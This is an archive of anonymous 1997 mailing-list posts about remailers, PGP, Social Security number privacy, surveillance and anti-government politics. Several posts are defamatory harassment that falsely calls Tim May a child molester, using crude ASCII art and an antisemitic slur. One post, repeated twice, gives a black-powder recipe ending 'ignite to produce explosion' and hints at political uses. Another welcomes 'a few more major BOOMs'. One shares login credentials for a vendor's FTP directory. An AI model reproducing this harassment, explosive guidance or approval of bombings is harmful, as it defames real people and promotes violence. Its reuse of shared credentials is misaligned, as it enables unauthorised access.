@_date: 1997-05-01 19:27:26
@_author: Anonymous 
@_subject: [CRYPTO] ZKP 
Tim May is widely recognized on the net, because of his frequent vitriolic postings, as someone/thing ready to cut off his own penis to spite the testicles, although his friends recognize him better from the rear.
   __
  /_/\__
  \_\/\_\ Tim May
  /\_\/_/
  \/_/

@_date: 1997-05-02 01:58:47
@_author: Anonymous 
@_subject: [CRYPTO] ZKP 
I think Vulis needs each of us to send ten copies of this back to him.   Graham-John Bullers                      Modulator of alt.2600.modulated       email : real at freenet.edmonton.ab.ca : ab756 at freenet.toronto.on.ca

@_date: 1997-05-04 20:02:34
@_author: Anonymous 
@_subject: Firewalls 
Timmy Mayo the self-admitted child molester possesses a rudimentary dick less than one inch long, half the size of his mother's clitoris, that barely makes a fistful. Thereby hangs the root of this Jew-hating sissy's sick fixation on little boys and Usenet forgeries.
         \|||/
         (o o)
     -ooO-(_)-Ooo- Timmy Mayo

@_date: 1997-05-06 01:31:13
@_author: Anonymous 
@_subject: Firewalls 
Reply-To: Graham-John Bullers Vulis does you wife no you write this?
Graham-John Bullers                      Modulator of alt.2600.modulated       email : real at freenet.edmonton.ab.ca : ab756 at freenet.toronto.on.ca

@_date: 1997-05-06 07:56:11
@_author: Anonymous 
@_subject: Rape, death and XS4ALL 
Funny, I didn't notice that *you* supported XS4ALL in the first place.
  Besides, you fail to understand that those who put up Radikal
mirrors didn't do it to support XS4ALL (mirroring just one of their
customers' pages doesn't help them much, eh?), but to fight for
free speech.
  Why don't you host that marijuana vendor's pages on your website?
   --Faktor 4

@_date: 1997-05-09 19:02:01
@_author: Anonymous 
@_subject: [ADMINISTRATIVIUM] Cyclic codes 
There's a rumor that Timmy May sells his dead relatives as fertilizer as they constitute the best shit in California.
         <<<<
        o(0-0)o
     -ooO-(_) Ooo-- Timmy May

@_date: 1997-05-10 01:43:52
@_author: Anonymous 
@_subject: El Gamal 
Vulis wrote re ElGamal:
Because Sameer's competition already hired him.  Get a clue...

@_date: 1997-05-11 02:14:21
@_author: Anonymous 
@_subject: Certified primes 
Given Timothy May's propensity to molest little children, is it any surprise that the state of California wants to have him castrated?
       /\ o-/\  Timothy May
      ///\|/\\\
     /   /|\   \

@_date: 1997-05-11 10:21:47
@_author: Anonymous 
@_subject: Wine Politics Again! (fwd) 
It should go without saying that this is a classic case of a dumb bill,
being passed to serve the special interest of liquor store owners.
It should go without saying that the above is nonsense.  Sorry Tim.  To
take only the least obvious point:  the Constitution states in Amendment
21 -- ratified in 1933 and beyond any argument part of our Constitution --
that states get to make all the rules about the transportation or
importation of liquor into their jurisdiction.  You may not like this
rule, but it is beyond any serious argument our law.  A state that uses
this power in a stupid way is not acting in any sense
"unconstitutionally".  Supporters of this bill can be called "dumb" or
"bought and paid for" or other unkind things.  But I fail to see how
exercising a constitutional right can be a crime against the constitution. [... ugly stuff about "soft targets"]
It ill behooves participants in a democracy to either advocate or even
tolerate or even cluck sympathetically at mass murder for political ends. This way lies Bosnia.
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | "Cyberspace" is not a place.
U. Miami School of Law     | [No email to foil spam]
P.O. Box 248087            | Coral Gables, FL 33124 USA | It's warm here.

@_date: 1997-05-13 02:04:18
@_author: Anonymous 
@_subject: Disinformation in L.A.Re: Disinformation in L.A. 
Potassium nitrate is a natural byproduct of the decay of organic material.
It is highly soluable in warm water, but at low temperatures (<10C) will
quickly precipitate out and be displaced in solution by other salts, such
as sodium chloride.  Extract by evaporation of water from chilled solution.
Mix seven parts potassium nitrate with three parts carbon (coal).  Compact
and ignite to produce explosion.
This has been known for centuries.  The Chinese used this mainly for
pyrotechnic displays and entertainment, however the Europeans have found
more political applications of the technology.

@_date: 1997-05-13 03:18:11
@_author: Anonymous 
@_subject: Disinformation in L.A. 
Potassium nitrate is a natural byproduct of the decay of organic material.
It is highly soluable in warm water, but at low temperatures (<10C) will
quickly precipitate out and be displaced in solution by other salts, such
as sodium chloride.  Extract by evaporation of water from chilled solution.
Mix seven parts potassium nitrate with three parts carbon (coal).  Compact
and ignite to produce explosion.
This has been known for centuries.  The Chinese used this mainly for
pyrotechnic displays and entertainment, however the Europeans have found
more political applications of the technology.

@_date: 1997-05-15 11:58:28
@_author: Anonymous 
@_subject: Anonymous Remailers 
Yes, you are missing a lot.  The bit about foreign inteligence agencies is
almost certainly a canard created by one Strassman at a conference in
Boston 2 years ago, then retracted.  Anyway, if you use chaining, it's
See  and
for the gory details.
Note that I use a remailer beacause this group may be gatewayed to Usenet
and I am trying to keep down the spam...
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | "Cyberspace" is not a place.
U. Miami School of Law     | P.O. Box 248087            | Coral Gables, FL 33124 USA | It's warm here.

@_date: 1997-05-17 10:55:45
@_author: Anonymous 
@_subject: Civil Disobediance 
Bah.  Here are two better ones:
1) "See you in court."
2) "You will get yours on election day.  Watch me write this check to your
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | "Cyberspace" is not a place.
U. Miami School of Law     | P.O. Box 248087            | Coral Gables, FL 33124 USA | It's hot here.

@_date: 1997-05-19 02:48:14
@_author: Anonymous 
@_subject: A wee bit of Civil Disobedience 
Someone newgrouped alt.binaries.warez.crypto a year or two ago.  It never got
any traffic, other than from a few spammers.
OTOH if someone could create something like comp.sources.cryptology, it might
get better reception.

@_date: 1997-05-20 02:12:34
@_author: Anonymous 
@_subject: Forgery detection 
Tim C. May is just another garden variety Intel pansy that has been misusing its `manhole' so badly that the overstretched sphincter cannot hold back the shit that all Intellers are full of and it spills out onto this mailing list.
            /\_/\
           ( x x )
       -oo0-(o o)-0oo- Tim C. May

@_date: 1997-05-21 05:06:09
@_author: Anonymous 
@_subject: Forgery detection 
I think Vulis needs each of us to send ten copies of this back to him.
Graham-John Bullers                      Modulator of alt.2600.modulated       email : real at freenet.edmonton.ab.ca : ab756 at freenet.toronto.on.ca

@_date: 1997-05-23 22:58:54
@_author: Anonymous 
@_subject: Spam laws threaten remailers? 
Two possibilities:
First, the law might not apply to remailer operators.  It only applies
to originators of messages.  It might make it illegal to use remailers
to send commercial messages, but that would apply to the users,
not to the remailer operators.
Even if it does apply to remailers, they can comply with it.
Put "Advertisement" at the front of each subject line, and put the
remailer operator's contact info in the message.  Remailer operators
are not generally hidden, so this does not hurt them any.

@_date: 1997-05-24 01:49:40
@_author: Anonymous 
@_subject: Accounts payable 
Timmy C[reep] May's reheated, refurbished, and regurgitated cud is completely inappropriate for the mailing lists into which it is     ' ' ' '     ^-O-O-^
 -ooO--U--Ooo- Timmy C[reep] May

@_date: 1997-05-24 02:00:09
@_author: Anonymous 
@_subject: NoneStories from the Bell jar & The theory of relativity 
The "Rodney King" effect here is amazing.  Jim Bell was not quite a model
citizen.  I don't think most of us would consider stinkbombing office
buildings normal behavior.  But that was 13 years ago, and compared to
what the feds did to him, Jim Bell comes out looking like an angel.  All
things are relative.
PS  For the benefit of our non-technical readers, a bell jar is a glass
dome used in vacuum experiments.  AFAIK, you can't make a stink bomb in
one. :)

@_date: 1997-05-26 12:14:05
@_author: Anonymous 
@_subject: No Subject 
>ftp://licenced:321 at ftp.mcafee.com/licenced/
 >> Anyone try this site?  I couldn't connect.
 >> The Pie Guy
The correct adress is:
ftp://licensed:321 at ftp.mcafee.com/licensed/
The /security dir is quite interesting...
(This message was encrypted with an unregistered copy of AutoPGP 2.23.)

@_date: 1997-05-28 10:44:25
@_author: Anonymous 
@_subject: Nym Servers 
Re: Nym Servers
Igor and D.V. have been discussing the viability of
cyberpromo as a host site for remailers; Igor points out
that many recipients will auto-trash anything from there.
On the other hand, it's a good entry point for a middleman remailer
or a nym remailer, as long as you can trash anything from there
without also trashing your remailer's mail :-)
In particular, your remailer was going to remove direct references
to cyberpromo anyway.
However, the prices have changed since I brought up the idea
a month ago.  At the time, they had auto-responders with POP mail -
- - $50/2yrs POP+autoresponder, or $39 one-time for a mail forwarder.
Now, however, they offer autoresponders for 3/$99 for three years,
with no mention of POP mail or forwarding - I don't know if they've
dropped the service (in favor of web hosting at $25/month),
or if it's still there and just not advertised.  (Of course,
there's still the moral dilemma that even $99 is $99 in Spamford's pocket :-)
               Spambert

@_date: 1997-05-29 19:48:25
@_author: Anonymous 
@_subject: [CRYPTO] Zero-knowledge commit 
Timmy `C' May proves that the Midwestern gene pool needs some chlorine in it.
            <<<<
           o(0-0)o
        -ooO-(_) Ooo-- Timmy `C' May

@_date: 1997-05-30 04:32:32
@_author: Anonymous 
@_subject: No Subject 
They can always harrass.  Supposedly the State Department reports to the
IRS anyone who does not give this info, but the IRS seems not to follow
up, an the only thing they could do under the law is impose the $500
penalty which would probably not survive a court challenge (I forget the
particular reasoning, but if they challenged and lost, no one would have
any fear not giving their SSNs out, similarly to why they don't charge
every cypherpunk under export laws - fear of grey is more useful than a
clear line that will be more liberal than they want).  When I applied for
a passport (specifically because it is a government recognized ID that
need not contain your social security number), I didn't write the IRS at
all (you have no duty to notify them), and IF contacted, I would simply
say "Who do I make the $500 check out to, and where do I send it, and who
should my lawyer contact to challenge it".  I have never been contacted. IANAL, but: There is another statute which says that any time a government
agency (it does not apply to corporations) asks for your SS# they have to
state the reason and authority they have to ask for it (something like a
state statute or order - I will look up the info and post here when I have
time).  Usually the behind-the-counter culture doesn't know about this. You can also give a religous objection. You can ask for the name of the
person and their exact title then ask nicely to speak with a manager
familar with the law or procedure, and that it might be illegal to ask for
that information without citing the authority (with the above law in
hand), etc.  Since they have to have alternate ID numbers unless they only
give licenses out to US citizens and not the Amish or others who have
religous objections - you can ask for one of these alternate numbers. You
can also be agreeable and say, OK, if you want to see my SSN so that you
can confirm that I am me, I will show it to you, but I don't want that
specific number on my license, and you can pick any number that is
convienient to you, or I can supply my standard "alternate-ID" number.
My state uses a number that is a wierd checksum of my name and birthdate
and who knows what, so it doesn't apply to my drivers license.
I had my SSN used (they didn't tell me that is what it was for, and this
was before I was as aware of the privacy matters) on a professional
license, and they did things like disclose it to people who bought their
mailing list and it appeared in some mailings.  I only had to call the
state office, explain about the problems of identity fraud, and had a new
license with a new number (which I use as my alt-id number)  within a week
(and they said they would not include SSNs with their mailing list).  Some
people are reasonable.
Generally they try to find the easiest path.  When it is clear that you
won't go away quietly, and that you are going to be more hassle than it is
worth (and that you aren't trying to evade any requirement, e.g. "You
agree that I have proper ID, and qualify in every other way, and the only
reason you won't is because I won't tell you my SSN even though you can't
cite the authority you have ...") you can usually get them to either
relent or say something slanderous in public.  A silly but necessary game.
Now if I can mail in a form, I usually use the alt-id number and write it
in place of the SSN with a note right next to it saying it is not my SSN
and that if you really want it you have to write me back and explain why
they want it.  (If they do, I send them a NDA with something to the effect
that if I find it has leaked anywhere they have to cover all costs
associated with correcting any record, etc.).  Given that they are usually
desparate to sign me up for whatever it is, and the mail is a hassle for
them, they just enter the alt-id number.  I keep a copy of the original
form with the Not-my-SSN statement in case someone wants to accuse me of
any kind of fraud.

@_date: 1997-06-01 10:38:17
@_author: Anonymous 
@_subject: SSN - when can agencies ask, and passports 
The privacy act of 1974 (public law 93-579) says that any government
agency has to provide you with the follwing when asking for a SSN:
1. If the disclosure is mandatory or optional
2. The statutory or other authority they have to ask for it
3. How it will be used
4. Any penalties for not disclosing it.
These should be in a "privacy act notice" the agency should already have.
As far as passports, I have a pointer to an article in the Western State
Law Review, Fall '92 issue by Stephen Kruger.  The title is Passports,
Social Security Numbers, & 26 USC sec 6039E where he points out that it is
probably unconstitutional to fine someone.
A plug is warranted since the above info (and a lot more of value) is in
Financial Privacy Report, Vol4N8 (August 1994) - I think back issues are
$15, but call first (612)-895-8757.  This issue is entitled 22 ways to
protect your social security number from thieves, snoops, and bureaucrats.
FPR / POB 1277 / Burnsville MN 55337

@_date: 1997-11-01 18:55:55
@_author: Anonymous 
@_subject: unknown_subject 
Does it really matter now where they met? They could have met at school,
in the park, at a christian day camp, in the back room of a gay bar,
wherever. As long as they both had a passing interest in computers or
even had access to a computer they met on the internet. "people are hitting on kids"
"people are sending kiddie porn"
"terrorists and criminals are using it to hatch schemes to kill kids"
"kids are using it to meet criminals and terrorists"
"kids are hitting on terrorists who send kiddie porn"
If I were someone who wanted to make the internet look like a place that needed STRONG governmental controls I would put the words terrorists,criminals,pornographers,drug dealers/addicts,
hate groups, or any other words that the american public has been trained to associate with fear and hatred in a story about the internet and pepper it with lines like " 10,000,000 children have home computers" and "its the children that lose out" and "no longer safe in the dangerous urban streets, children must turn to
the internet" and a few things about losing their innocence at a tender
age. Then I would call the peice "the secret war against our children"
The same people who rushed to associate crime with rock and roll music then later rap music, and the same people that rushed to associate bizzare murders with dungeons and dragons and then later vampire
role playing games, and the same people who belive that someone
who has unprotected sex with someone to get drugs is not at all responsible when they get aids, the same people that endorse cerfews
"to protect children" and agree that high school students should be
sujected to mandatory drug tests and locker searches will all run to
endorse any laws that the government wishes to place regarding "protecting
children on the internet"

@_date: 1997-11-02 03:46:15
@_author: Anonymous 
@_subject: No Subject 
Tim May said:
Some argue that things have to get a lot worse before they'll get better.
The media coverups and brainwashing will ensure that it has to get pretty
damn bad before Joe Shmoe is going to notice anything is amiss.  Perhaps to
the stage that he knows a few people who have first hand experience of
family members assasinated by storm-troopers "protecting" them from
The BATFuckers are just one symptom.
A few more major BOOMs would accelerate the trend.
But just how bad is bad enough?  As bad as Stalins Russia?  What was it, 1
in 10 assasinated?  What sort of place would this be like to live in when
it gets that bad?  What is the likely replacement system going to be like,
what sort of government is going to arise out of that kind of mess?
Would a similar system fill the power vacuum, or would we be left with a
the desired anarchy.
I wonder.  There might be an argument for just laying low until
cryptoanarchy starves the bloated cancerous growth.
-----BEGIN PGP PUBLIC KEY BLOCK-----
-----END PGP PUBLIC KEY BLOCK-----

@_date: 1997-11-02 06:04:19
@_author: Anonymous 
@_subject: No Subject 
-----BEGIN PGP SIGNED MESSAGE-----
Matthew Nuckolls says
The purpose is to create a persistent nym.  The signature, and public key
ensures that you know that this message is from the same person as you were
attempting to nit pick :-]
True.  So it's only as good as the keys you might fetch from a keyserver
that you have no connection to in the web of trust.
You aren't supposed to link it to my True Name.
All that can be done is to get a signature from a timestamp server, and a
signature from Bill Stewart's nym key signing service.
I don't think there are any timestamp servers which provide key signatures.
Anyone want to start one?
This is important because it prevents someone else from generating more
keys with the same userID, such as happened with Tim May's blacknet key.
The only protection I have against that is the public record of my key
being posted to cypherpunks.  The archive helps as a public record of first publishing of a key with this
A timestamp service signature on my key would be a better solution.
-----BEGIN PGP PUBLIC KEY BLOCK-----
-----END PGP PUBLIC KEY BLOCK-----

@_date: 1997-11-02 07:49:05
@_author: Anonymous 
@_subject: Technology 'secures' gunfire [CNN] 
Jonathan has hit on a point which illustrates the danger of the
surveillance technologies that are _already_ in place, vis a vis,
the Internet.
  Something lost in the euphoria over the citizen's radical new ability to access information: Yahoo Search--"Posts by _me_."
is that the same technolgy, and more, is at the fingertips of
the proverbial 4 Horsemen AND (now for the _really_ bad news)
at the fingertips of "John Law, the Citizen's Friend."
  Sadly, "garbage in--garbage out" _has_ always, and _will_ always,
result(ed) in such inanities as Drug Counselors being 'rated' at
the same level as Drug Dealers when the computer spits out the
results of a badly structured "search for the _bad_guys_."
  Naturally, when the police mistakenly kick in the door of a Drug Counselor, it is always a 'regretable tragedy' when they
shoot holes in the ten year old boy in the hallway who is holding
an over-ripe banana which 'looked like a weapon.' (Almost a true
life example, told to me by a friend who left her career in law
enforcement because she was still in possession of a conscience which was capable of recognizing that children killed by those who are 'just following orders' are just as dead as the children
killed by those who are 'out of control.')
{The person in question 'pulled' her shot at the last moment, upon
 realizing she was about to murder a child with a banana. Because
 the banana "could have been a weapon," an investigation was not
 required for an officer firing upon an unarmed citizen.
 I regard this lady as a wonderful example of someone who has held
 themself to a higher standard than their government regulators and
 their peers. What is a shame is that someone who _should_ be the
 type of person charged with protecting us had to leave the system
 because there is no future for those who choose sanity, logic and
 humanity over 'following orders.'}
  If you stop to consider Jonathan's examples of (paraphrased),
"give me the names of every citizen in location 'A' at time 'B'
who has used the word 'normal' in an email in the last ten years,
etc., etc." in light of Internet search engine capabilities being
extended to such technologies as 'citizen physical location monitoring', 'voice recognition', 'DNA pattern analysis' (e.g. heriditary potential for violence, etc.), then the future may be very scary, indeed.
Think about this:
"Ladies and gentleman of the jury, the person who is reading this
post is the 'only' individual, out of over 20 million processed by
the Never Wrong Criminal Identification Compter System, who is in
the post reader's general location, today, has completed their
high school education and has a family member who has committed
murder in the last five generations."
(What? You claim you are not the _only_ person in New York City,
 with a high school education. Nice try, pal, but the computer is
 never wrong.)
"Although no murder has been committed yet, statistics show that
someone in that area will be, within the next two days, so I ask
that you return a verdict of 'Guilty of murder in the first degree'
and we will pick up and execute the reader of this post as soon
as a body turns up."
...in light of _this_:
A citizen was found guilty of murder by a jury, based on the slim
eyewitness testimony of a passerby who caught a fleeting glimpse
of the murderer, despite testimony from over a dozen people that
the defendant was, at the time of the murder, attending a wedding
thousands of miles away.
Some of those giving testimony did not even know the man prior to
meeting him at the wedding, and were in no way related to the man,
but the jury was still swayed by the prosecutor's claim that this
wide variety of law-abiding, average citizens were lying to try
and protect the defendant.
Do you have a great-great-grandfather who committed murder? Then you are, by heridity, a potential murderer. It's in your blood!
This is '10 points against' you. All of the kindness you have don
in your life does not count in your favor, because any fool can
see that it was done in an attempt to trick the jury.
  Of course, Jonathan is a raving lunatic for suggesting these
possibilities, much like the mentally unstable people who history
as believing that one day people would be able to send electromagnetic
waves through the atmosphere and have their images and voices appear on
machines in distant places.
  Seriously, history has shown that any technology capable of being used
for great evil _will_ be used for great evil.
  The reason that technology radically increases the ante in the game between good and evil is that if one 'evil' person is in control of
technology that ten million 'good' people do not have access to, then
the basic humanity or inhumanity of humankind, in general, is really
not an important part of the equation which will determine the future.
  (I challenge all other cypherpunks to a fistfight, the only rule being that I can use an Uzi, and you can't.)
  Remember...when all is said and done, my dad was an optomist.
George Orwelle Jr.

@_date: 1997-11-02 11:27:54
@_author: Anonymous 
@_subject: No Subject 
After seeing the intents of PGP Inc. with the
release of their new PGP that breaks the old
free versions, I have all but written them off as anything but the Enemy, and am waiting for
a public reply on the list by Tim May to make
it official.
But now what? Please someone answer my questions
about PGP - it appears that the 5.x versions are not
compatible with the 2.x versions which came previous.
Is this so? Also, the direction they seem to be
heading is in providing more and more non-free
GAKked product. But aren't the 2.x and 5.x versions
freeware? If so, can't others - a group of individuals - take that source code and build off
of that? Piss on these assholes and their licensing
fees. It was inevitable, anyway. They are a corporation after all, and the corporations are not on "our" sides.
I can see a scenario where government is impotent
and destroyed within 10 years. What will remain
and will be harder to eradicate are the corporations.
I don't think we should rely on corporate software
whenever possible, because it always comes with
an ulterior motive. Is there an effort to maintain
a version of PGP based on the free 2.x sources
that is not affiliateed with the fuckwads at PGP Inc.? If not, is it high time some of us began such an effort?

@_date: 1997-11-02 16:13:50
@_author: Anonymous 
@_subject: No Subject 
-----BEGIN PGP SIGNED MESSAGE-----
Monty says
That would be nice.  I wonder, could one of our list hosts add a
script to sign outgoing majordomo traffic?
Here's a script to do it:

@_date: 1997-11-02 18:32:47
@_author: Anonymous 
@_subject: Definition: Spin Doctoring 
Definition: Spin Doctoring  You are standing naked in the gas chamber
with a thousand of your fellow ethnic outlaws when the voice of Herr
Himmler blares out from  the speakers,  "I have decided to spare your
lives." The loud cheers of yourself and your grateful ethnological
comrades are cut short by the sound of a deadly gas being released from
the ceiling vents. A different voice comes over the speaker, saying,
"What Herr Himmler _meant_ to say, was"
Sick humor? Moi?

@_date: 1997-11-02 18:33:43
@_author: Anonymous 
@_subject: InfoWar Feedback Form #AB7-09-C3F87-%&((&%$%* 
I, the undersigned undertoad, herby express my evaluation of the
TruthMonger multi-user persona, based on my understanding of the contents of Epilogue 8 of 'InfoWar'.
TruthMonger should:
1. Run for President of the United States of America. [ ] ~ Y/N
2. Seek medical help immediately. [ ] ~ Y/N
PLP Signature: Thanking you for your input,
A Concerned Illegal Immigrant

@_date: 1997-11-02 19:56:03
@_author: Anonymous 
@_subject: PGP 5.0 international patches and hacks 
A new resource page is up on the cypherpunks.to web site, to host
various patches and hacks to the pgp 5.0i source. Currently a patch
which fixes the expiration date for the software and "Version" comment
in ASCII-armored messages is available.
For more, visit

@_date: 1997-11-03 06:15:39
@_author: Anonymous 
@_subject: effective GACK fighting (fwd) 
Fortunately some of these "good" lawyers already exist at the Institute for Justice.  Basically, they are a libertarian version of the ACLU.  They've accomplished some good things and deserve the support (read $$$) of freedom-minded individuals everywhere.  (note: I'm not connected with them
in any way; just letting the cypherpunk community know about an organization
in sync with our views)
 "If you seek a courtroom champion for individual liberty, free market
  solutions, and limited government, look only as far as the Institute
  for Justice.  When politicians pass sweepingly intrusive laws and
  bureaucrats build their empires of paperwork and power, only the
  Institute for Justice brings them to account in court."
  -- Bill Benson has done some extensive research (his book is called The Law That Never Was) regarding the 16th Amendment (the so-called Income Tax Amendment) and how it was ratified.  According to the information he has uncovered through exhaustive research in D.C. and all of the state capitals of the then 48 states, the 16th Amendment was never ratified by 3/4ths of the states. (see  for more info)
Friends of mine have spoken to Mr. Benson about this, and he says that the courts won't touch it with a ten foot pole.  He even sells a package (or at least he was selling it back in 1995) of legal information about the non-ratification of the 16th that can be used as a defense in an income tax case.  According to Mr. Benson (in 1995), each of the cases was dropped when the defense made it clear they were going to argue their defense based on this point.
I understand that folks in the "patriot" movement have tried to take this to the Supreme Court without success.  The Court refused to hear it.
Assuming Mr. Benson's research is accurate and legitimate, the 16th didn't even come close to being ratified and is truly a Law That Never Was.  Think about that next April 15th...the IRS's "lawful" authority is based upon a
legal fiction.  That's why it's called >voluntary< compliance.

@_date: 1997-11-03 06:29:33
@_author: Anonymous 
@_subject: Vote CypherPunk! 
I'd probably have a lot more respect for Congresscritters if they cared
enough about any issue to physically fight about it. Maybe we could issue
them weapons, too; then term limits would become a moot point. (Who would
win if Jesse Helms and Diane Feinstein had a fight to the death? The American citizens.)
A suitable quote from Monty Python:
    We would like to apologize for the way politicians are
    represented in this programme. It was never our intention  to
    imply that politicians are weak-kneed, political time-servers
    who are concerned more with their personal vendettas and
    private power struggles than the problems of government, nor
    to suggest at any point that they sacrifice their credibility
    by denying free debate on vital matters in the mistaken
    impression that party unity comes before the well-being of
    the people they supposedly represent, nor to imply at any
    stage that they are squabbling little toadies without an
    ounce of concern for the vital social problems of today. Nor
    indeed do we intend that viewers should consider them as
    crabby ulcerous self-seeking vermin with furry legs and an
    addiction to alcohol and certain explicit sexual practices
    which some people might find offensive. We are sorry if this
    impression has come across.
In fact, they could run this at the top of every hour on C-SPAN. I'll call
my cable company.

@_date: 1997-11-03 17:48:38
@_author: Anonymous 
@_subject: SynCrypt: the new PGP? 
Anybody heard of syncrypt?  It is like pgp but has lots of cool features.  File wiping, group
encryption, automatic encryption of files put in certain directories.
Get this, hiding encrypted files in pictures!  Automatically.  It pulls
them back out again too.
Plus it has an interesting "20 questions" method for backing up your
passphrase.  If you forget your passphrase you have to answer 25 of 27
questions like "who was your favorite teacher" to get it back.
Bruce Schneier is working with them, so they should have good crypto.
It has blowfish, des and triple des, and idea.  The keys are el gamal.
Problem is the freeware is crippled to 10 encryptions (unlimited
decryptions).  $50 for full functions.
Is this the new pgp?  No gak or even cak in sight.

@_date: 1997-11-03 20:47:07
@_author: Anonymous 
@_subject: Remailer hating Nazis (was Re: The BIG Lie (Jesus Confesses)) 
Paul Pomes was complaining about Jeff Burchell's huge cajones remailer to Jeff
Burchell's upstream and employers about the same time the rest of the Databasix
gang was doing it.  Paul Pomes appears to be a part of the Databasix gang.
Gary Burnore had a mongo page at So did Paul Pomes, Belinda Bryan, and the rest of the Databasix gang.
Too bad it's down for now, but it'll be back.

@_date: 1997-11-04 02:08:45
@_author: Anonymous 
@_subject: SynCrypt: the new PGP? 
You mean Microsoft.  It's foolish to reject encryption software because
it runs on the OS used by 90% of its customers.
You don't trust Schneier?  You've seen the limitations of source code
release.  Experts like Schneier and his team designing the crypto is
worth more than a bunch of know nothings scratching their heads and
wondering where to begin with 1000+ pages of source code.

@_date: 1997-11-04 09:22:00
@_author: Anonymous 
@_subject: Need info! / Re: Export a random number, go to jail 
Is it legal to export '37'?
How about '148'?
A Fucking Iditot

@_date: 1997-11-04 09:36:58
@_author: Anonymous 
@_subject: Why porn must be stopped at all costs, by Jodi Hoffman 
Best way to mobilize a society: give them a Devil to hate. It's much easier
to get people to hate than to love. Blame the Press, the Permissive Society,
the Liberals, the Educational System. Of course, once you get rid of the
Devil, it's usually a good idea to have the slave's collars on everyone
BEFORE they realize the problem's still around.
You need a song to cheer you up. Try this one:
"There's a place in the world for the angry young man
With his working-class ties and his radical plans,
He refuses to bend, he refuses to fall,
And he's always at home with his back to the wall.
He's proud of the scars and the battles he's lost
And he struggles and bleeds as he hangs on the cross,
And he likes to be known as the angry young man."
                    --Billy Joel, "Angry Young Man"
You clearly need a better country to live in. I suggest China; they have a
long history of keeping impure materials out of the hands of the easily
influenced sheeple. If you have trouble there, perhaps Singapore, Iraq,
Syria, or Lebanon would be more to your liking. If you're interested in a
proven weight-loss program, maybe North Korea is your best bet. Done already, by the gub'mint. Kids can't read or write at all nowadays,
despite the high level of per-pupil spending.
Done already, by the FCC and the religious right.
Done already, by the actions of mudsucker politicians who seek re-election
at any cost, even the freedoms guaranteed by the Constitution. "I think
I'll vote Demopublican this year, or maybe Republicrat. I have such a
hard time telling their extremist positions apart."
I could claim this was the reason Usenet was created, but I'm not a
conspiracy buff. Of course, on C-SPAN, we can see politicians ranting
at each other, the President, and nothing at all.
The religious right again.
See if you can guess who said this and when:
"A democracy cannot exist as a permanent form of government. It can only
exist until a majority of voters discover that they can vote themselves
largess out of the public treasury."
Was it:
a) Alexander Tytler, 18th century;
b) Thomas Jefferson, early 1800s;
c) Karl Marx, late 1800s;
d) V. I. Lenin, 1915
Here's a hint: Pick the Scottish historian who lived in the 1700s. So the
concept of a "bankrupt democracy" has been around for a while.
Create a climate of fear. Spread uncertainty and doubt among the populace.
Wave the battle flags of pedophilia and terrorism proudly from the ramparts,
so that people gladly give up their liberties to be saved from the Horsemen
of the Apocalypse.
If someone were to hang around your child's schoolyard with a full-auto
AK-47, would you scream "DON'T SACRIFICE MY CHILD ON THE ALTAR OF THE
SECOND AMENDMENT"?
Hey, that's one rule!
Defense of any kind is wasteful by nature. Even white corpuscles don't do
jack when there's no infection to fight.
Say what? The last I heard, military recruiting was up because it was a way
to get training in technical areas that might otherwise be impossible for
recruits to learn. (Of course, some people still have to carry rifles...)
Land of the Freeh, and the home of the knave. Thanks for making it just a
little worse by your actions.

@_date: 1997-11-04 09:53:59
@_author: Anonymous 
@_subject: Why Jodi Hoffman must be called a 'Dumb Cunt' and told to 'Go Fuck Yourself' at all costs, by TruthMonger 
Theory TruthMonger's true identity is the ventriloquist dummy from 'Soap'.
Theory Those strange sounds you hear when lying quietly in bed at night?
They are the sound of people slapping their foreheads when they
realize they are arguing with a dummy. (;>}
A. Dummy II

@_date: 1997-11-04 11:41:18
@_author: Anonymous 
@_subject: [ON TOPIC] Re: Why porn must be stopped at all costs, by Jodi Hoffman 
Sorry, that's off-topic.
You _can_, however, discuss 'Remailer Hating Nazis'...

@_date: 1997-11-04 13:11:29
@_author: Anonymous 
@_subject: Terrorism is a NON-THREAT (fwd) 
Prosecutor: "You should find this nanny guilty of murder because
             young people like to party."
Jury: "Duuhhh...OK!"
  What I find ironically hilarious, offensive and sad, is that there
are still so many new laws being passed, in spite of the fact that
they are no longer really needed.
  Courtrooms now pretty much just serve as an arena for engaging in
the age-old sport of public stoning. Whoever does the best job of
finger pointing, while working the crowd into a frenzy, wins.
  Tim McVeigh was Dead Meat (TM) the minute the judge ruled that
fingers in the courtroom could only be pointed at Terrible Timmy.
  I guess I'm an old fart...I remember when $15 million could buy
you a decent attorney.
  I don't own any guns, so I guess when the Feds kick my door in,
I'll just point at the dog, and hope they go for my clever ruse.
  Hell, I'm even willing to testify...

@_date: 1997-11-04 14:16:08
@_author: Anonymous 
@_subject: unknown_subject 
I have been wondering about all the media attention on "aids assasins"
recently. "With a national list of people infected with the HIV virus, people could
be more informed about the people they choose to have sex with"
hiring people. It will also never be used to discredit people either, who
would say "why are you listening to him, he is a faggot" or "he hangs out
with fags, you know how all fags are."

@_date: 1997-11-04 14:38:46
@_author: Anonymous 
@_subject: www.cypherpunks.to 
I tried  and couldn't get connected.
I dropped the www and got sent to the www site.
And the root password there is...

@_date: 1997-11-04 20:08:24
@_author: Anonymous 
@_subject: Porn gave me brain damage!! 
messages, you might recall them, they were about the government using
perceived threats to convince the public that they needed legislation to protect them from harmful elements on the Internet. I am not posting now about any sort of government conspiracy
or mind control tactics used to convince people they need to give up rights
in order to be safe, I am posting to tell you all how very wrong I was.
pornographia, a syndrome caused by exposure to pornography. I have been afflicted with an obsession with pornography since I first
realized I was attracted to women. I remember looking at them and imagining
them with no clothes on. I know now that this is when the damage was begun,
and there is nothing I can do now to reverse it.
class and the textbook was full of crudely drawn genetalia. I looked at
these pictures frequently while studying, little did I know what was being
done to me, the pictures were causing chemical changes in my brain,
stimulating synapses and causing neurons to fire.
I got drawn deeper and deeper into pornography I changed, first I started hanging around with other boys interested in female
genetalia. Then I started searching through my parents belongings and
stealing whatever I could to support my habits. Newspapers, catalogs,
books, national geographic, anything with pictures of women in it would do.
My parents didn't understand what I was going through they just assumed that I was going through a phase, they didn't know that my little
"phase" caused new hormones to be released into my brain changing it for good.
dedicated porn user. I always surrounded myself with people that thought
porn was "cool" or that it was "no big deal". I became increasingly
estranged from my family and even went so far as to move away from home for my freshman year in college. I was 18 now and could legally buy
dangerous pornographic material. Once I was living away from home I started
